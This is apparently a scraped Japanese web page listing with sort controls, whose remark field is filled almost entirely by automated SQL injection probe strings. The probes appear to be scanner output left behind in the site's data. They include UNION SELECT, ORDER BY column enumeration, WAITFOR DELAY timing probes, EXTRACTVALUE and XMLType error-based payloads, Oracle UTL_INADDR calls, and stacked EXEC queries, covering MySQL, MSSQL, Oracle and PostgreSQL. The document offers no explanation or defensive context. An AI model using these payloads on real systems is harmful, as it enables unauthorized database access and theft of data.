



表示順の選択 [まま] 日付: [昇順] [降順]  名前: [昇順] [降順]  (各マークをポイントすると、コメント(注釈)があるかも知れません。)
備 考
-1903') UNION ALL SELECT CONCAT(0x7170787871,0x4f64657754776f467a4f,0x716a717a71)#
-1158') UNION ALL SELECT CONCAT(0x7170787871,0x5a656e4d5a58636c4744576e724f536f726d4b6d5173704c44697a424b4857696a7944576c5a5655,0x716a717a71)#
wYxD') UNION ALL SELECT CONCAT(0x7170787871,0x7863764573496c724a63,0x716a717a71)#
wYxD') UNION ALL SELECT CONCAT(0x7170787871,0x535173634654734543797570744543416d68697a7077796977716e537070664754724b6958415a71,0x716a717a71)#
wYxD') ORDER BY 2#
wYxD') ORDER BY 3#
wYxD') ORDER BY 4#
wYxD') ORDER BY 6#
wYxD') ORDER BY 10#
wYxD') ORDER BY 8052#
wYxD')) ORDER BY 1#
wYxD') ORDER BY 1#
wYxD ORDER BY 1-- pbRe
wYxD ORDER BY 1-- CNwd
wYxD)) ORDER BY 1-- dJoj
wYxD) ORDER BY 1-- PoRg
wYxD" ORDER BY 1-- lZia
wYxD") ORDER BY 1-- sGte
wYxD' ORDER BY 1-- bhRn
wYxD%' ORDER BY 1-- gkff
wYxD') ORDER BY 1-- Ndvn
wYxD' ORDER BY 1-- SvFp
wYxD')) ORDER BY 1-- BVQa
wYxD') ORDER BY 1-- OEIa
wYxD;DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--
wYxD));DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--
wYxD);DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--
wYxD";DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--
wYxD");DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--
wYxD%';DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--
wYxD';DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--
wYxD'));DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--
wYxD');DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--
wYxD;WAITFOR DELAY '0:0:32'--
wYxD));WAITFOR DELAY '0:0:32'--
wYxD);WAITFOR DELAY '0:0:32'--
wYxD";WAITFOR DELAY '0:0:32'--
wYxD");WAITFOR DELAY '0:0:32'--
wYxD%';WAITFOR DELAY '0:0:32'--
wYxD';WAITFOR DELAY '0:0:32'--
wYxD'));WAITFOR DELAY '0:0:32'--
wYxD');WAITFOR DELAY '0:0:32'--
(SELECT CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(CASE WHEN (1535=1535) THEN TO_NUMBER(1) ELSE TO_NUMBER(0) END)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113) FROM DUAL)
(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(CASE WHEN (9850=9850) THEN CHAR(49) ELSE CHAR(48) END)+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))
(SELECT (CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (3925=3925) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)))
(SELECT CONCAT(0x7170787871,(ELT(2975=2975,1)),0x716a717a71))
(SELECT CONCAT(CONCAT('qpxxq',(CASE WHEN (2451=2451) THEN '1' ELSE '0' END)),'qjqzq'))
wYxD;DECLARE @CSus NVARCHAR(4000);SET @CSus=(SELECT 'qpxxq'+(SELECT (CASE WHEN (4799=4799) THEN '1' ELSE '0' END))+'qjqzq');EXEC @CSus--
wYxD));DECLARE @CSus NVARCHAR(4000);SET @CSus=(SELECT 'qpxxq'+(SELECT (CASE WHEN (4799=4799) THEN '1' ELSE '0' END))+'qjqzq');EXEC @CSus--
wYxD);DECLARE @CSus NVARCHAR(4000);SET @CSus=(SELECT 'qpxxq'+(SELECT (CASE WHEN (4799=4799) THEN '1' ELSE '0' END))+'qjqzq');EXEC @CSus--
wYxD";DECLARE @CSus NVARCHAR(4000);SET @CSus=(SELECT 'qpxxq'+(SELECT (CASE WHEN (4799=4799) THEN '1' ELSE '0' END))+'qjqzq');EXEC @CSus--
wYxD");DECLARE @CSus NVARCHAR(4000);SET @CSus=(SELECT 'qpxxq'+(SELECT (CASE WHEN (4799=4799) THEN '1' ELSE '0' END))+'qjqzq');EXEC @CSus--
wYxD%';DECLARE @CSus NVARCHAR(4000);SET @CSus=(SELECT 'qpxxq'+(SELECT (CASE WHEN (4799=4799) THEN '1' ELSE '0' END))+'qjqzq');EXEC @CSus--
wYxD';DECLARE @CSus NVARCHAR(4000);SET @CSus=(SELECT 'qpxxq'+(SELECT (CASE WHEN (4799=4799) THEN '1' ELSE '0' END))+'qjqzq');EXEC @CSus--
wYxD'));DECLARE @CSus NVARCHAR(4000);SET @CSus=(SELECT 'qpxxq'+(SELECT (CASE WHEN (4799=4799) THEN '1' ELSE '0' END))+'qjqzq');EXEC @CSus--
wYxD');DECLARE @CSus NVARCHAR(4000);SET @CSus=(SELECT 'qpxxq'+(SELECT (CASE WHEN (4799=4799) THEN '1' ELSE '0' END))+'qjqzq');EXEC @CSus--
wYxD,(SELECT 7494 FROM (SELECT ROW(7494,5846)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(7494=7494,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 6202 UNION SELECT 4152 UNION SELECT 8913 UNION SELECT 6766)a GROUP BY x))s)
(CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (3931=3931) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC))
wYxD PROCEDURE ANALYSE(EXTRACTVALUE(2607,CONCAT(0x5c,0x7170787871,(SELECT (CASE WHEN (2607=2607) THEN 1 ELSE 0 END)),0x716a717a71)),1)-- Hssk
wYxD PROCEDURE ANALYSE(EXTRACTVALUE(2607,CONCAT(0x5c,0x7170787871,(SELECT (CASE WHEN (2607=2607) THEN 1 ELSE 0 END)),0x716a717a71)),1)
wYxD)) PROCEDURE ANALYSE(EXTRACTVALUE(2607,CONCAT(0x5c,0x7170787871,(SELECT (CASE WHEN (2607=2607) THEN 1 ELSE 0 END)),0x716a717a71)),1) AND ((9180=9180
wYxD) PROCEDURE ANALYSE(EXTRACTVALUE(2607,CONCAT(0x5c,0x7170787871,(SELECT (CASE WHEN (2607=2607) THEN 1 ELSE 0 END)),0x716a717a71)),1) AND (4301=4301
wYxD" PROCEDURE ANALYSE(EXTRACTVALUE(2607,CONCAT(0x5c,0x7170787871,(SELECT (CASE WHEN (2607=2607) THEN 1 ELSE 0 END)),0x716a717a71)),1) AND "LQUQ"="LQUQ
wYxD") PROCEDURE ANALYSE(EXTRACTVALUE(2607,CONCAT(0x5c,0x7170787871,(SELECT (CASE WHEN (2607=2607) THEN 1 ELSE 0 END)),0x716a717a71)),1) AND ("akqd"="akqd
wYxD' PROCEDURE ANALYSE(EXTRACTVALUE(2607,CONCAT(0x5c,0x7170787871,(SELECT (CASE WHEN (2607=2607) THEN 1 ELSE 0 END)),0x716a717a71)),1) AND 'aKvN' LIKE 'aKvN
wYxD%' PROCEDURE ANALYSE(EXTRACTVALUE(2607,CONCAT(0x5c,0x7170787871,(SELECT (CASE WHEN (2607=2607) THEN 1 ELSE 0 END)),0x716a717a71)),1) AND 'bPYu%'='bPYu
wYxD') PROCEDURE ANALYSE(EXTRACTVALUE(2607,CONCAT(0x5c,0x7170787871,(SELECT (CASE WHEN (2607=2607) THEN 1 ELSE 0 END)),0x716a717a71)),1) AND ('Kuik' LIKE 'Kuik
wYxD' PROCEDURE ANALYSE(EXTRACTVALUE(2607,CONCAT(0x5c,0x7170787871,(SELECT (CASE WHEN (2607=2607) THEN 1 ELSE 0 END)),0x716a717a71)),1) AND 'AeMI'='AeMI
wYxD')) PROCEDURE ANALYSE(EXTRACTVALUE(2607,CONCAT(0x5c,0x7170787871,(SELECT (CASE WHEN (2607=2607) THEN 1 ELSE 0 END)),0x716a717a71)),1) AND (('BNEw'='BNEw
wYxD') PROCEDURE ANALYSE(EXTRACTVALUE(2607,CONCAT(0x5c,0x7170787871,(SELECT (CASE WHEN (2607=2607) THEN 1 ELSE 0 END)),0x716a717a71)),1) AND ('arKU'='arKU
-8430 OR 2122=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (2122=2122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))-- zgAA
-1805 OR 2122=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (2122=2122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))
-4196)) OR 2122=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (2122=2122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AND ((7855=7855
-8479) OR 2122=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (2122=2122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AND (3653=3653
-9890" OR 2122=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (2122=2122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AND "VvvE"="VvvE
-9253") OR 2122=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (2122=2122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AND ("qseg"="qseg
-4905' OR 2122=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (2122=2122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AND 'AFHs' LIKE 'AFHs
-3890%' OR 2122=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (2122=2122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AND 'XZuS%'='XZuS
-1453') OR 2122=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (2122=2122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AND ('bFhJ' LIKE 'bFhJ
-2579' OR 2122=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (2122=2122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AND 'slGb'='slGb
-8062')) OR 2122=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (2122=2122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AND (('PyGJ'='PyGJ
-5598') OR 2122=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (2122=2122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AND ('FExp'='FExp
wYxD AND 7005=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7005=7005) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))-- DwyR
wYxD AND 7005=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7005=7005) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))
wYxD)) AND 7005=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7005=7005) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AND ((8782=8782
wYxD) AND 7005=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7005=7005) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AND (1079=1079
wYxD" AND 7005=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7005=7005) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AND "lPbh"="lPbh
wYxD") AND 7005=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7005=7005) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AND ("RDEo"="RDEo
wYxD' AND 7005=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7005=7005) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AND 'asYh' LIKE 'asYh
wYxD%' AND 7005=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7005=7005) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AND 'EKUM%'='EKUM
wYxD') AND 7005=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7005=7005) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AND ('PqQw' LIKE 'PqQw
wYxD' AND 7005=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7005=7005) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AND 'GKFQ'='GKFQ
wYxD')) AND 7005=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7005=7005) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AND (('ntOI'='ntOI
wYxD') AND 7005=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7005=7005) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AND ('twgm'='twgm
-3273 OR 7900=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7900=7900) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL)-- ieyY
-5444 OR 7900=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7900=7900) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL)
-2927)) OR 7900=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7900=7900) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND ((7003=7003
-3889) OR 7900=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7900=7900) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND (9195=9195
-3488" OR 7900=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7900=7900) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND "fYUU"="fYUU
-9650") OR 7900=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7900=7900) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND ("HiSh"="HiSh
-1816' OR 7900=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7900=7900) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'jKbb' LIKE 'jKbb
-1015%' OR 7900=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7900=7900) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'JyYy%'='JyYy
-5711') OR 7900=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7900=7900) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND ('RIdE' LIKE 'RIdE
-6995' OR 7900=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7900=7900) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'yTWb'='yTWb
-5872')) OR 7900=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7900=7900) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND (('cABi'='cABi
-7113') OR 7900=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7900=7900) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND ('WpBG'='WpBG
wYxD AND 1374=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1374=1374) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL)-- XRoL
wYxD AND 1374=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1374=1374) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL)
wYxD)) AND 1374=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1374=1374) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND ((5850=5850
wYxD) AND 1374=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1374=1374) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND (9146=9146
wYxD" AND 1374=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1374=1374) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND "uqls"="uqls
wYxD") AND 1374=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1374=1374) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND ("ARGE"="ARGE
wYxD' AND 1374=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1374=1374) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'LhQN' LIKE 'LhQN
wYxD%' AND 1374=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1374=1374) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'WFps%'='WFps
wYxD') AND 1374=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1374=1374) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND ('Grks' LIKE 'Grks
wYxD' AND 1374=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1374=1374) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'dCLL'='dCLL
wYxD')) AND 1374=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1374=1374) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND (('XcpV'='XcpV
wYxD') AND 1374=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1374=1374) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND ('Sush'='Sush
wYxD AND 1160=CONCAT(CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113),(SELECT (CASE WHEN (1160=1160) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))-- xzsJ
wYxD AND 1160=CONCAT(CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113),(SELECT (CASE WHEN (1160=1160) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))
wYxD)) AND 1160=CONCAT(CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113),(SELECT (CASE WHEN (1160=1160) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113)) AND ((5256=5256
wYxD) AND 1160=CONCAT(CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113),(SELECT (CASE WHEN (1160=1160) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113)) AND (4395=4395
wYxD" AND 1160=CONCAT(CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113),(SELECT (CASE WHEN (1160=1160) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113)) AND "HxSi"="HxSi
wYxD") AND 1160=CONCAT(CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113),(SELECT (CASE WHEN (1160=1160) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113)) AND ("gWKS"="gWKS
wYxD' AND 1160=CONCAT(CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113),(SELECT (CASE WHEN (1160=1160) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113)) AND 'IkEb' LIKE 'IkEb
wYxD%' AND 1160=CONCAT(CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113),(SELECT (CASE WHEN (1160=1160) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113)) AND 'yzHl%'='yzHl
wYxD') AND 1160=CONCAT(CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113),(SELECT (CASE WHEN (1160=1160) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113)) AND ('nxRc' LIKE 'nxRc
wYxD' AND 1160=CONCAT(CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113),(SELECT (CASE WHEN (1160=1160) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113)) AND 'nGWI'='nGWI
wYxD')) AND 1160=CONCAT(CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113),(SELECT (CASE WHEN (1160=1160) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113)) AND (('oXQA'='oXQA
wYxD') AND 1160=CONCAT(CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113),(SELECT (CASE WHEN (1160=1160) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113)) AND ('HtvD'='HtvD
wYxD AND 3271=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3271=3271) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113)))-- KaNd
wYxD AND 3271=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3271=3271) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113)))
wYxD)) AND 3271=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3271=3271) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND ((9460=9460
wYxD) AND 3271=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3271=3271) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND (7127=7127
